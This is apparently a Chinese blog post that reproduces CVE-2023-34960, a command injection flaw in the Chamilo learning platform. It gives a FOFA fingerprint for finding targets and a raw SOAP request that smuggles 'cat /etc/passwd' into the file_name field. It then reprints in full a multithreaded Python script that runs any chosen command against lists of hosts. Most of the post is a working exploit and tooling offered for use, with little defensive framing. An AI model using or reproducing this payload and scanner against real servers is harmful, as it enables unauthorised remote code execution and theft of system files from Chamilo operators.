【漏洞复现】CVE-2023-34960-Chamilo
工具地址
https://github.com/Pari-Malam/CVE-2023-34960
漏洞介绍
Chamilo 是一个电子学习平台,也称为学习管理系统 (LMS)。Chamilo additional_webservices.php存在命令执行漏洞。
fofa指纹
"Chamilo"
版本
Chamilo <=1.11.18
复现
poc
POST /main/webservices/additional_webservices.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-Length: 880
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip, deflate
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="http://mail.cosecadvirtual.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">`{}`.pptx'|" |cat /etc/passwd||a #</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>
工具备份
# Author: Pari Malam
import argparse
import random
import warnings
import requests
import os
import xml.etree.ElementTree as ET
from sys import stdout
from concurrent.futures import ThreadPoolExecutor
from colorama import Fore, Style
warnings.filterwarnings("ignore")
FY = Fore.YELLOW
FG = Fore.GREEN
FR = Fore.RED
FC = Fore.CYAN
FW = Fore.WHITE
def clear():
os.system('clear' if os.name == 'posix' else 'cls')
def mkdir():
if not os.path.exists('Results'):
os.mkdir('Results')
def banners():
clear()
stdout.write(" \n")
stdout.write(""+Fore.LIGHTRED_EX +"██████╗ ██████╗ █████╗ ██████╗ ██████╗ ███╗ ██╗███████╗ ██████╗ ██████╗ ██████╗███████╗ ██╗ ██████╗ \n")
stdout.write(""+Fore.LIGHTRED_EX +"██╔══██╗██╔══██╗██╔══██╗██╔════╝ ██╔═══██╗████╗ ██║██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝ ██║██╔═══██╗\n")
stdout.write(""+Fore.LIGHTRED_EX +"██║ ██║██████╔╝███████║██║ ███╗██║ ██║██╔██╗ ██║█████╗ ██║ ██║██████╔╝██║ █████╗ ██║██║ ██║\n")
stdout.write(""+Fore.LIGHTRED_EX +"██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║\n")
stdout.write(""+Fore.LIGHTRED_EX +"██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║\n")
stdout.write(""+Fore.LIGHTRED_EX +"██████╔╝██║ ██║██║ ██║╚██████╔╝╚██████╔╝██║ ╚████║██║ ╚██████╔╝██║ ██║╚██████╗███████╗██╗██║╚██████╔╝\n")
stdout.write(""+Fore.LIGHTRED_EX +"╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝╚═╝╚═╝ ╚═════╝ \n")
stdout.write(""+Fore.YELLOW +"═════════════╦═════════════════════════════════╦════════════════════════════════════════════════════════════\n")
stdout.write(""+Fore.YELLOW +"╔════════════╩═════════════════════════════════╩═════════════════════════════╗\n")
stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"AUTHOR "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" PARI MALAM "+Fore.YELLOW+"║\n")
stdout.write(""+Fore.YELLOW +"╔════════════════════════════════════════════════════════════════════════════╝\n")
stdout.write(""+Fore.YELLOW +"║ \x1b[38;2;255;20;147m• "+Fore.GREEN+"GITHUB "+Fore.RED+" |"+Fore.LIGHTWHITE_EX+" GITHUB.COM/PARI-MALAM "+Fore.YELLOW+"║\n")
stdout.write(""+Fore.YELLOW +"╚════════════════════════════════════════════════════════════════════════════╝\n")
print(f"{FY}[CVE-2023-34960] - {FG}Unauthenticated Command Injection\n{Style.RESET_ALL}")
banners()
def users_agents():
with open("lib/ua.txt", "r") as ua_file:
user_agents = ua_file.readlines()
user_agents = [ua.strip() for ua in user_agents if ua.strip()]
return user_agents
def chamilo(url, command, user_agents):
url = "http://" + url.strip("/")
body = f'''<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{url}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns1:wsConvertPpt>
<param0 xsi:type="ns2:Map">
<item>
<key xsi:type="xsd:string">file_data</key>
<value xsi:type="xsd:string"></value>
</item>
<item>
<key xsi:type="xsd:string">file_name</key>
<value xsi:type="xsd:string">`{{}}`.pptx'|" |{command}||a #</value>
</item>
<item>
<key xsi:type="xsd:string">service_ppt2lp_size</key>
<value xsi:type="xsd:string">720x540</value>
</item>
</param0>
</ns1:wsConvertPpt>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>'''
headers = {'Content-Type': 'text/xml', 'User-Agent': random.choice(user_agents)}
try:
r = requests.post(f'{url}/main/webservices/additional_webservices.php', data=body, headers=headers, verify=False, timeout=5)
except Exception as e:
print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Invalid {Style.RESET_ALL}")
return None
if r.status_code == 200:
try:
pwned = ET.fromstring(r.text)
except ET.ParseError:
print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Invalid XML Response{Style.RESET_ALL}")
return None
tagged = pwned.find('.//return')
if tagged is not None:
content = tagged.text
print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FG}[w00t!] - {FC}Vulnerable: {FW}{content}{Style.RESET_ALL}")
return content
else:
print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Not found on execution. Check manually.{Style.RESET_ALL}")
return None
return None
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="URL address (without 'http://' prefix)")
parser.add_argument("-f", "--filename", help="File containing URLs")
parser.add_argument("-c", "--command", help="Command to execute (optional)")
parser.add_argument("-t", "--threads", type=int, default=10, help="Maximum number of concurrent threads")
parser.add_argument("-o", "--output", help="Output file for saving the results")
args = parser.parse_args()
command = args.command or 'uname -a' or 'whoami'
if args.filename:
with open(args.filename, "r") as url_file:
urls = url_file.readlines()
urls = [url.strip() if url.startswith(("http://", "https://")) else url.strip() for url in urls]
elif args.url:
urls = [args.url]
else:
parser.error(f"{FR}Whut are you doin bro?")
max_workers = args.threads
user_agents = users_agents()
results = []
with ThreadPoolExecutor(max_workers=max_workers) as executor:
futures = [executor.submit(chamilo, url, command, user_agents) for url in urls]
for future, url in zip(futures, urls):
result = future.result()
if result:
results.append((url, result))
else:
print(f"{FY}[CVE-2023-34960] - {FW}{url} - {FR}[Failed!] - {FC}Not Vulnerable{Style.RESET_ALL}")
if args.output:
with open(args.output, "a") as file:
for url, result in results:
file.write(f"URL: {url}\nResult: Results/{result}\n\n")
if __name__ == '__main__':
main()
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。后续可能会有评论区,不过也可以在github联系我。